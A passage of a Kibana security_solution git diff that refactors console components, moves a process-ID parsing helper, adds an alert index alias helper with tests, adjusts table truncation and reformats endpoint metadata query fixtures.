+import { NEW_FEATURES_TOUR_STORAGE_KEYS } from '../../../../../../../common/constants'; import { useKibana } from '../../../../../../common/lib/kibana'; import * as i18n from './translations'; @@ -34,6 +34,7 @@ export interface RulesFeatureTourContextType { export const SEARCH_CAPABILITIES_TOUR_ANCHOR = 'search-capabilities-tour-anchor'; +const TOUR_STORAGE_KEY = NEW_FEATURES_TOUR_STORAGE_KEYS.RULE_MANAGEMENT_PAGE; const TOUR_POPOVER_WIDTH = 400; const tourConfig: EuiTourState = { @@ -61,7 +62,7 @@ export const RulesFeatureTour: FC = () => { const restoredState = useMemo( () => ({ ...tourConfig, - ...storage.get(RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY), + ...storage.get(TOUR_STORAGE_KEY), }), [storage] ); @@ -70,7 +71,7 @@ export const RulesFeatureTour: FC = () => { useEffect(() => { const { isTourActive, currentTourStep } = tourState; - storage.set(RULES_MANAGEMENT_FEATURE_TOUR_STORAGE_KEY, { isTourActive, currentTourStep }); + storage.set(TOUR_STORAGE_KEY, { isTourActive, currentTourStep }); }, [tourState, storage]); const [shouldShowSearchCapabilitiesTour, setShouldShowSearchCapabilitiesTour] = useState(false); diff --git a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts index ce4060dcf6e87..93910509193e2 100644 --- a/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts +++ b/x-pack/plugins/security_solution/public/detections/pages/detection_engine/rules/types.ts @@ -19,6 +19,7 @@ import type { import type { Filter } from '@kbn/es-query'; import type { RuleAction } from '@kbn/alerting-plugin/common'; import type { DataViewListItem } from '@kbn/data-views-plugin/common'; +import type { Unit } from '@kbn/datemath'; import type { RuleAlertAction } from '../../../../../common/detection_engine/types'; import type { FieldValueQueryBar } from '../../../components/rules/query_bar'; @@ -242,6 +243,11 @@ export interface ActionsStepRuleJson { meta?: unknown; } +export interface QuickQueryPreviewOptions { + timeframe: Unit; + timeframeEnd: moment.Moment; +} + export interface AdvancedPreviewForm { interval: string; lookback: string; diff --git a/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx b/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx index 2d07932e388b4..b6085ed5356c0 100644 --- a/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx +++ b/x-pack/plugins/security_solution/public/management/components/console/components/bad_argument.tsx @@ -31,7 +31,7 @@ export const BadArgument = memo + (({ commands, display = 'defaul {commandsByGroups.map((commandsByGroup) => { const groupLabel = commandsByGroup[0].helpGroupLabel; const filteredCommands = getFilteredCommands(commandsByGroup); + + if (filteredCommands.length === 0) { + return null; + } + return ( props.theme.eui.euiCodeFontFamily}; +`; export const ConsoleCodeBlock = memo<{ children: ReactNode; inline?: boolean; - textColor?: 'default' | 'error' | 'success'; + textColor?: EuiTextProps['color']; bold?: boolean; }>(({ children, inline = false, textColor = 'default', bold = false }) => { - const baseStyledComponent = inline ? EuiTextColor : EuiText; - - const CodeBlock = euiStyled(baseStyledComponent).attrs({ - transparentBackground: true, - size: 's', - })`{ - color: ${(props) => { - if (textColor === 'error') { - return props.theme.eui.euiColorDanger; - } else if (textColor === 'success') { - return props.theme.eui.euiColorSuccessText; - } else { - return props.theme.eui.euiColorDarkestShade; - } - }}; - font-weight: ${(props) => { - return bold ? props.theme.eui.euiFontWeightBold : props.theme.eui.euiFontWeightRegular; - }}; - font-family: ${(props) => props.theme.eui.euiCodeFontFamily}; - padding: 0; - } - `; - - return {children}; + return ( + + {bold ? {children} : children} + + ); }); ConsoleCodeBlock.displayName = 'ConsoleCodeBlock'; diff --git a/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx b/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx index 7041b2e166f47..117ac7f8438aa 100644 --- a/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx +++ b/x-pack/plugins/security_solution/public/management/components/console/components/unknown_comand.tsx @@ -56,7 +56,7 @@ export const UnknownCommand = memo(({ command, s return ( + { describe('when using parseCommandInput()', () => { @@ -145,21 +145,4 @@ describe('when using parsed command input utils', () => { ); }); }); - - describe('when using parsedPidOrEntityIdParameter()', () => { - it('should parse a pid as a number and return proper params', () => { - const parameters = parsedPidOrEntityIdParameter({ pid: ['123'] }); - expect(parameters).toEqual({ pid: 123 }); - }); - - it('should parse an entity id correctly and return proper params', () => { - const parameters = parsedPidOrEntityIdParameter({ entityId: ['123qwe'] }); - expect(parameters).toEqual({ entity_id: '123qwe' }); - }); - - it('should return undefined if no params are defined', () => { - const parameters = parsedPidOrEntityIdParameter({}); - expect(parameters).toEqual(undefined); - }); - }); }); diff --git a/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts b/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts index 984dd77eb4786..32477e6783832 100644 --- a/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts +++ b/x-pack/plugins/security_solution/public/management/components/console/service/parsed_command_input.ts @@ -8,7 +8,6 @@ /* eslint-disable @typescript-eslint/no-explicit-any */ import type { CommandDefinition } from '..'; -import type { EndpointActionDataParameterTypes } from '../../../../../common/endpoint/types'; export type ParsedArgData = string[]; @@ -185,16 +184,3 @@ export const getArgumentsForCommand = (command: CommandDefinition): string[] => ? [buildArgumentText({ required: requiredArgs, optional: optionalArgs })] : []; }; - -export const parsedPidOrEntityIdParameter = (parameters: { - pid?: ParsedArgData; - entityId?: ParsedArgData; -}): EndpointActionDataParameterTypes => { - if (parameters.pid) { - return { pid: Number(parameters.pid[0]) }; - } else if (parameters.entityId) { - return { entity_id: parameters.entityId[0] }; - } - - return undefined; -}; diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx index 111575a94521b..fd749bb1562db 100644 --- a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/kill_process_action.tsx @@ -8,6 +8,7 @@ import React, { memo, useEffect } from 'react'; import { FormattedMessage } from '@kbn/i18n-react'; import type { IHttpFetchError } from '@kbn/core-http-browser'; +import { parsedPidOrEntityIdParameter } from './utils'; import { ActionSuccess } from './action_success'; import type { ActionDetails, @@ -17,7 +18,6 @@ import { useGetActionDetails } from '../../hooks/endpoint/use_get_action_details import type { EndpointCommandDefinitionMeta } from './types'; import { useSendKillProcessRequest } from '../../hooks/endpoint/use_send_kill_process_endpoint_request'; import type { CommandExecutionComponentProps } from '../console/types'; -import { parsedPidOrEntityIdParameter } from '../console/service/parsed_command_input'; import { ActionError } from './action_error'; import { ACTION_DETAILS_REFRESH_INTERVAL } from './constants'; diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx index 10c3a7d1a4a0d..d29dd4cbdee02 100644 --- a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/suspend_process_action.tsx @@ -8,6 +8,7 @@ import React, { memo, useEffect } from 'react'; import { FormattedMessage } from '@kbn/i18n-react'; import type { IHttpFetchError } from '@kbn/core-http-browser'; +import { parsedPidOrEntityIdParameter } from './utils'; import { ActionSuccess } from './action_success'; import type { ActionDetails, @@ -17,7 +18,6 @@ import { useGetActionDetails } from '../../hooks/endpoint/use_get_action_details import type { EndpointCommandDefinitionMeta } from './types'; import { useSendSuspendProcessRequest } from '../../hooks/endpoint/use_send_suspend_process_endpoint_request'; import type { CommandExecutionComponentProps } from '../console/types'; -import { parsedPidOrEntityIdParameter } from '../console/service/parsed_command_input'; import { ActionError } from './action_error'; import { ACTION_DETAILS_REFRESH_INTERVAL } from './constants'; diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.test.ts b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.test.ts new file mode 100644 index 0000000000000..ab84e9de959f0 --- /dev/null +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.test.ts @@ -0,0 +1,27 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { parsedPidOrEntityIdParameter } from './utils'; + +describe('Endpoint Responder - Utilities', () => { + describe('when using parsedPidOrEntityIdParameter()', () => { + it('should parse a pid as a number and return proper params', () => { + const parameters = parsedPidOrEntityIdParameter({ pid: ['123'] }); + expect(parameters).toEqual({ pid: 123 }); + }); + + it('should parse an entity id correctly and return proper params', () => { + const parameters = parsedPidOrEntityIdParameter({ entityId: ['123qwe'] }); + expect(parameters).toEqual({ entity_id: '123qwe' }); + }); + + it('should return undefined if no params are defined', () => { + const parameters = parsedPidOrEntityIdParameter({}); + expect(parameters).toEqual(undefined); + }); + }); +}); diff --git a/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.ts b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.ts new file mode 100644 index 0000000000000..9ebcd090bd2a0 --- /dev/null +++ b/x-pack/plugins/security_solution/public/management/components/endpoint_responder/utils.ts @@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import type { EndpointActionDataParameterTypes } from '../../../../common/endpoint/types'; + +export const parsedPidOrEntityIdParameter = (parameters: { + pid?: string[]; + entityId?: string[]; +}): EndpointActionDataParameterTypes => { + if (parameters.pid) { + return { pid: Number(parameters.pid[0]) }; + } else if (parameters.entityId) { + return { entity_id: parameters.entityId[0] }; + } + + return undefined; +}; diff --git a/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx b/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx index f9fe611869a85..7bc3e5ac0be6d 100644 --- a/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx +++ b/x-pack/plugins/security_solution/public/management/components/policy_response/policy_response_wrapper.test.tsx @@ -28,7 +28,15 @@ import { jest.mock('../../hooks/endpoint/use_get_endpoint_policy_response'); jest.mock('../../hooks/endpoint/use_get_endpoint_details'); -describe('when on the policy response', () => { +// FLAKY: https://github.com/elastic/kibana/issues/136272 +// FLAKY: https://github.com/elastic/kibana/issues/139033 +// FLAKY: https://github.com/elastic/kibana/issues/139032 +// FLAKY: https://github.com/elastic/kibana/issues/139031 +// FLAKY: https://github.com/elastic/kibana/issues/139030 +// FLAKY: https://github.com/elastic/kibana/issues/139028 +// FLAKY: https://github.com/elastic/kibana/issues/139029 +// FLAKY: https://github.com/elastic/kibana/issues/139027 +describe.skip('when on the policy response', () => { const docGenerator = new EndpointDocGenerator(); const createPolicyResponse = ( overallStatus: HostPolicyResponseActionStatus = HostPolicyResponseActionStatus.success, diff --git a/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx b/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx index 122bfa6fdd07c..e5fdeb6c31638 100644 --- a/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/detection_response/cases_table/cases_table.tsx @@ -101,12 +101,13 @@ const getTableColumns: GetTableColumns = () => [ { field: 'id', name: i18n.CASES_TABLE_COLUMN_NAME, - truncateText: true, - textOnly: true, 'data-test-subj': 'recentlyCreatedCaseName', - render: (id: string, { name }) => ( - + {name} ), diff --git a/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx b/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx index a2373b0734ece..3ae0d5e1384c3 100644 --- a/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/detection_response/host_alerts_table/host_alerts_table.tsx @@ -101,11 +101,13 @@ const getTableColumns: GetTableColumns = (handleClick) => [ { field: 'hostName', name: i18n.HOST_ALERTS_HOSTNAME_COLUMN, - truncateText: true, - textOnly: true, 'data-test-subj': 'hostSeverityAlertsTable-hostName', render: (hostName: string) => ( - + ), diff --git a/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx b/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx index 0eed36ff14102..3e9e79a39de58 100644 --- a/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/detection_response/rule_alerts_table/rule_alerts_table.tsx @@ -59,6 +59,7 @@ export const getTableColumns: GetTableColumns = ({ getAppUrl, navigateTo, openRu data-test-subj={`${id}-tooltip`} title={i18n.OPEN_RULE_DETAIL_TOOLTIP} content={name} + anchorClassName="eui-textTruncate" > {/* eslint-disable-next-line @elastic/eui/href-or-on-click */} [ { field: 'userName', name: i18n.USER_ALERTS_USERNAME_COLUMN, - truncateText: true, - textOnly: true, 'data-test-subj': 'userSeverityAlertsTable-userName', render: (userName: string) => ( - + ), diff --git a/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx b/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx index f595b6a62ddbb..4035cc86bfe14 100644 --- a/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx +++ b/x-pack/plugins/security_solution/public/overview/components/overview_risky_host_links/risky_hosts_disabled_module.tsx @@ -16,7 +16,7 @@ import { devToolPrebuiltContentUrl } from '../../../../common/constants'; import { OpenInDevConsoleButton } from '../../../common/components/open_in_dev_console'; import { useChcekSignalIndex } from '../../../detections/containers/detection_engine/alerts/use_check_signal_index'; import type { LinkPanelListItem } from '../link_panel'; -import { useSpaceId } from '../../../risk_score/containers/common'; +import { useSpaceId } from '../../../common/hooks/use_space_id'; export const RISKY_HOSTS_DOC_LINK = 'https://www.github.com/elastic/detection-rules/blob/main/docs/experimental-machine-learning/host-risk-score.md'; diff --git a/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts b/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts index 2c145c180bbde..04e694b2cedbb 100644 --- a/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts +++ b/x-pack/plugins/security_solution/public/resolver/data_access_layer/factory.ts @@ -89,7 +89,7 @@ export function dataAccessLayerFactory( indexPatterns, }, }; - if (category === 'alerts') { + if (category === 'alert') { return context.services.http.post('/api/endpoint/resolver/events', { query: commonFields.query, body: JSON.stringify({ @@ -193,7 +193,7 @@ export function dataAccessLayerFactory( filter: [{ term: { 'event.id': eventID } }], }, }; - if (eventCategory.includes('alerts') === false) { + if (eventCategory.includes('alert') === false) { const response: ResolverPaginatedEvents = await context.services.http.post( '/api/endpoint/resolver/events', { diff --git a/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx b/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx index 508f0763bcab1..99558f6e4a90d 100644 --- a/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx +++ b/x-pack/plugins/security_solution/public/resolver/view/panels/event_detail.tsx @@ -39,6 +39,7 @@ import type { SafeResolverEvent } from '../../../../common/endpoint/types'; import { deepObjectEntries } from './deep_object_entries'; import { useFormattedDate } from './use_formatted_date'; import * as nodeDataModel from '../../models/node_data'; +import { expandDottedObject } from '../../../../common/utils/expand_dotted'; const eventDetailRequestError = i18n.translate( 'xpack.securitySolution.resolver.panel.eventDetail.requestError', @@ -158,9 +159,10 @@ function EventDetailFields({ event }: { event: SafeResolverEvent }) { namespace: React.ReactNode; descriptions: Array<{ title: React.ReactNode; description: React.ReactNode }>; }> = []; - for (const [key, value] of Object.entries(event)) { + const expandedEventObject: object = expandDottedObject(event); + for (const [key, value] of Object.entries(expandedEventObject)) { // ignore these keys - if (key === 'agent' || key === 'ecs' || key === '@timestamp') { + if (key === 'agent' || key === 'ecs' || key === '@timestamp' || !value) { continue; } diff --git a/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx b/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx index 830e41ea3a3c7..047e3302433ce 100644 --- a/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx +++ b/x-pack/plugins/security_solution/public/resolver/view/panels/node_events_of_type.tsx @@ -104,9 +104,10 @@ const NodeEventsListItem = memo(function ({ nodeID: string; eventCategory: string; }) { - const timestamp = eventModel.eventTimestamp(event); - const eventID = eventModel.eventID(expandDottedObject(event)); - const winlogRecordID = eventModel.winlogRecordID(event); + const expandedEvent = expandDottedObject(event); + const timestamp = eventModel.eventTimestamp(expandedEvent); + const eventID = eventModel.eventID(expandedEvent); + const winlogRecordID = eventModel.winlogRecordID(expandedEvent); const date = useFormattedDate(timestamp) || i18n.translate('xpack.securitySolution.enpdoint.resolver.panelutils.noTimestampRetrieved', { @@ -129,8 +130,8 @@ const NodeEventsListItem = memo(function ({ @@ -148,7 +149,7 @@ const NodeEventsListItem = memo(function ({ data-test-subj="resolver:panel:node-events-in-category:event-link" {...linkProps} > - + ); diff --git a/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx b/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx index 50c7a095887c0..cdafc7d63c8b1 100644 --- a/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx +++ b/x-pack/plugins/security_solution/public/risk_score/containers/all/index.tsx @@ -34,7 +34,7 @@ import { useAppToasts } from '../../../common/hooks/use_app_toasts'; import { isIndexNotFoundError } from '../../../common/utils/exceptions'; import { useIsExperimentalFeatureEnabled } from '../../../common/hooks/use_experimental_features'; import type { inputsModel } from '../../../common/store'; -import { useSpaceId } from '../common'; +import { useSpaceId } from '../../../common/hooks/use_space_id'; export interface RiskScoreState { data?: RiskScoreType; diff --git a/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx b/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx index 685a0c992c9f1..396d86e2d6acc 100644 --- a/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx +++ b/x-pack/plugins/security_solution/public/risk_score/containers/kpi/index.tsx @@ -30,7 +30,7 @@ import { isIndexNotFoundError } from '../../../common/utils/exceptions'; import type { ESTermQuery } from '../../../../common/typed_json'; import { useIsExperimentalFeatureEnabled } from '../../../common/hooks/use_experimental_features'; import type { SeverityCount } from '../../../common/components/severity/types'; -import { useSpaceId } from '../common'; +import { useSpaceId } from '../../../common/hooks/use_space_id'; type GetHostsRiskScoreProps = KpiRiskScoreRequestOptions & { data: DataPublicPluginStart; diff --git a/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts b/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts index 8c69ae2df30da..0d560b600ae34 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts +++ b/x-pack/plugins/security_solution/public/timelines/components/open_timeline/helpers.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import { getOr, isEmpty } from 'lodash/fp'; import type { Action } from 'typescript-fsa'; import uuid from 'uuid'; diff --git a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx index 32af7f9920a34..b34338b4cbce9 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx +++ b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/helpers.tsx @@ -9,6 +9,7 @@ import { some } from 'lodash/fp'; import { useMemo } from 'react'; import type { TimelineEventsDetailsItem } from '../../../../../common/search_strategy'; import { getFieldValue } from '../../../../detections/components/host_isolation/helpers'; +import { DEFAULT_ALERTS_INDEX, DEFAULT_PREVIEW_INDEX } from '../../../../../common/constants'; interface GetBasicDataFromDetailsData { alertId: string; @@ -51,3 +52,20 @@ export const useBasicDataFromDetailsData = ( [alertId, hostName, isAlert, ruleName, timestamp] ); }; + +/* +The referenced alert _index in the flyout uses the `.internal.` such as +`.internal.alerts-security.alerts-spaceId` in the alert page flyout and +.internal.preview.alerts-security.alerts-spaceId` in the rule creation preview flyout +but we always want to use their respective aliase indices rather than accessing their backing .internal. indices. +*/ +export const getAlertIndexAlias = ( + index: string, + spaceId: string = 'default' +): string | undefined => { + if (index.startsWith(`.internal${DEFAULT_ALERTS_INDEX}`)) { + return `${DEFAULT_ALERTS_INDEX}-${spaceId}`; + } else if (index.startsWith(`.internal${DEFAULT_PREVIEW_INDEX}`)) { + return `${DEFAULT_PREVIEW_INDEX}-${spaceId}`; + } +}; diff --git a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx index 2e69985258247..c9b1d42b535ec 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx +++ b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.test.tsx @@ -11,8 +11,6 @@ import '../../../../common/mock/match_media'; import { TestProviders } from '../../../../common/mock'; import { TimelineId, TimelineTabs } from '../../../../../common/types/timeline'; import type { Ecs } from '../../../../../common/ecs'; -import { mockAlertDetailsData } from '../../../../common/components/event_details/__mocks__'; -import type { TimelineEventsDetailsItem } from '../../../../../common/search_strategy'; import { KibanaServices, useKibana, @@ -21,7 +19,9 @@ import { import { mockBrowserFields, mockRuntimeMappings } from '../../../../common/containers/source/mock'; import { coreMock } from '@kbn/core/public/mocks'; import { mockCasesContext } from '@kbn/cases-plugin/public/mocks/mock_cases_context'; +import { useTimelineEventsDetails } from '../../../containers/details'; import { allCasesPermissions } from '../../../../cases_test_utils'; +import { DEFAULT_ALERTS_INDEX, DEFAULT_PREVIEW_INDEX } from '../../../../../common/constants'; const ecsData: Ecs = { _id: '1', @@ -37,19 +37,16 @@ const ecsData: Ecs = { }, }; -const mockAlertDetailsDataWithIsObject = mockAlertDetailsData.map((detail) => { - return { - ...detail, - isObjectArray: false, - }; -}) as TimelineEventsDetailsItem[]; - jest.mock('../../../../../common/endpoint/service/host_isolation/utils', () => { return { isIsolationSupported: jest.fn().mockReturnValue(true), }; }); +jest.mock('../../../../common/hooks/use_space_id', () => ({ + useSpaceId: jest.fn().mockReturnValue('testSpace'), +})); + jest.mock( '../../../../detections/containers/detection_engine/alerts/use_host_isolation_status', () => { @@ -101,18 +98,23 @@ const mockSearchStrategy = jest.fn(); const defaultProps = { timelineId: TimelineId.test, - loadingEventDetails: false, - detailsEcsData: ecsData, isHostIsolationPanelOpen: false, handleOnEventClosed: jest.fn(), onAddIsolationStatusClick: jest.fn(), expandedEvent: { eventId: ecsData._id, indexName: '' }, - detailsData: mockAlertDetailsDataWithIsObject, tabType: TimelineTabs.query, browserFields: mockBrowserFields, runtimeMappings: mockRuntimeMappings, }; +jest.mock('../../../containers/details', () => { + const actual = jest.requireActual('../../../containers/details'); + return { + ...actual, + useTimelineEventsDetails: jest.fn().mockImplementation(() => []), + }; +}); + describe('event details footer component', () => { beforeEach(() => { const coreStartMock = coreMock.createStart(); @@ -169,4 +171,76 @@ describe('event details footer component', () => { const element = wrapper.queryByTestId('side-panel-flyout-footer'); expect(element).toBeNull(); }); + + describe('Alerts', () => { + const propsWithAlertIndex = { + ...defaultProps, + expandedEvent: { + eventId: ecsData._id, + indexName: `.internal${DEFAULT_ALERTS_INDEX}-testSpace`, + }, + }; + test('it uses the alias alerts index', () => { + render( + + + + ); + expect(useTimelineEventsDetails).toHaveBeenCalledWith({ + entityType: 'events', + indexName: `${DEFAULT_ALERTS_INDEX}-testSpace`, + eventId: propsWithAlertIndex.expandedEvent.eventId ?? '', + runtimeMappings: mockRuntimeMappings, + skip: false, + }); + }); + + test('it uses the alias alerts preview index', () => { + const alertPreviewProps = { + ...propsWithAlertIndex, + expandedEvent: { + ...propsWithAlertIndex.expandedEvent, + indexName: `.internal${DEFAULT_PREVIEW_INDEX}-testSpace`, + }, + }; + render( + + + + ); + + expect(useTimelineEventsDetails).toHaveBeenCalledWith({ + entityType: 'events', + indexName: `${DEFAULT_PREVIEW_INDEX}-testSpace`, + eventId: propsWithAlertIndex.expandedEvent.eventId, + runtimeMappings: mockRuntimeMappings, + skip: false, + }); + }); + + test(`it does NOT use the alerts alias when regular events happen to include a trailing '${DEFAULT_ALERTS_INDEX}' in the index name`, () => { + const indexName = `.ds-logs-endpoint.alerts-default-2022.08.09-000001${DEFAULT_ALERTS_INDEX}`; // a regular event, that happens to include a trailing `.alerts-security.alerts` + const propsWithEventIndex = { + ...defaultProps, + expandedEvent: { + eventId: ecsData._id, + indexName, + }, + }; + + render( + + + + ); + + expect(useTimelineEventsDetails).toHaveBeenCalledWith({ + entityType: 'events', + indexName, // <-- use the original index name, not the alerts alias + eventId: propsWithEventIndex.expandedEvent.eventId, + runtimeMappings: mockRuntimeMappings, + skip: false, + }); + }); + }); }); diff --git a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx index 8859b6f20ab33..2c0247a4d61da 100644 --- a/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx +++ b/x-pack/plugins/security_solution/public/timelines/components/side_panel/event_details/index.tsx @@ -20,7 +20,8 @@ import type { HostRisk } from '../../../../risk_score/containers'; import { useHostRiskScore } from '../../../../risk_score/containers'; import { useHostIsolationTools } from './use_host_isolation_tools'; import { FlyoutBody, FlyoutHeader, FlyoutFooter } from './flyout'; -import { useBasicDataFromDetailsData } from './helpers'; +import { useBasicDataFromDetailsData, getAlertIndexAlias } from './helpers'; +import { useSpaceId } from '../../../../common/hooks/use_space_id'; interface EventDetailsPanelProps { browserFields: BrowserFields; @@ -51,10 +52,13 @@ const EventDetailsPanelComponent: React.FC = ({ timelineId, isReadOnly, }) => { + const currentSpaceId = useSpaceId(); + const { indexName } = expandedEvent; + const eventIndex = getAlertIndexAlias(indexName, currentSpaceId) ?? indexName; const [loading, detailsData, rawEventData, ecsData, refetchFlyoutData] = useTimelineEventsDetails( { entityType, - indexName: expandedEvent.indexName ?? '', + indexName: eventIndex ?? '', eventId: expandedEvent.eventId ?? '', runtimeMappings, skip: !expandedEvent.eventId, diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts index 6eb04c9833e27..906b1e3168a70 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts +++ b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/metadata.test.ts @@ -248,30 +248,6 @@ describe('test endpoint routes', () => { must: [ { bool: { - filter: [ - { - terms: { - 'united.agent.policy_id': [], - }, - }, - { - exists: { - field: 'united.endpoint.agent.id', - }, - }, - { - exists: { - field: 'united.agent.agent.id', - }, - }, - { - term: { - 'united.agent.active': { - value: true, - }, - }, - }, - ], must_not: { terms: { 'agent.id': [ @@ -280,6 +256,12 @@ describe('test endpoint routes', () => { ], }, }, + filter: [ + { terms: { 'united.agent.policy_id': [] } }, + { exists: { field: 'united.endpoint.agent.id' } }, + { exists: { field: 'united.agent.agent.id' } }, + { term: { 'united.agent.active': { value: true } } }, + ], }, }, { @@ -290,13 +272,7 @@ describe('test endpoint routes', () => { filter: [ { bool: { - should: [ - { - exists: { - field: 'united.agent.upgrade_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgrade_started_at' } }], minimum_should_match: 1, }, }, @@ -304,13 +280,7 @@ describe('test endpoint routes', () => { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.upgraded_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.upgraded_at' } }], minimum_should_match: 1, }, }, @@ -323,13 +293,7 @@ describe('test endpoint routes', () => { bool: { must_not: { bool: { - should: [ - { - exists: { - field: 'united.agent.last_checkin', - }, - }, - ], + should: [{ exists: { field: 'united.agent.last_checkin' } }], minimum_should_match: 1, }, }, @@ -337,16 +301,20 @@ describe('test endpoint routes', () => { }, { bool: { - should: [ - { - exists: { - field: 'united.agent.unenrollment_started_at', - }, - }, - ], + should: [{ exists: { field: 'united.agent.unenrollment_started_at' } }], minimum_should_match: 1, }, }, + { + bool: { + must_not: { + bool: { + should: [{ exists: { field: 'united.agent.policy_revision_idx' } }], + minimum_should_match: 1, + }, + }, + }, + }, ], minimum_should_match: 1, }, @@ -355,13 +323,7 @@ describe('test endpoint routes', () => { bool: { must_not: { bool: { - should: [ - { - match: { - 'host.ip': '10.140.73.246', - }, - }, - ], + should: [{ match: { 'host.ip': '10.140.73.246' } }], minimum_should_match: 1, }, }, diff --git a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts b/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts index 31b383f2a033e..30189459ff167 100644 --- a/x-pack/plugins/security_solution/server/endpoint/routes/metadata/query_builders.fixtures.ts +++ 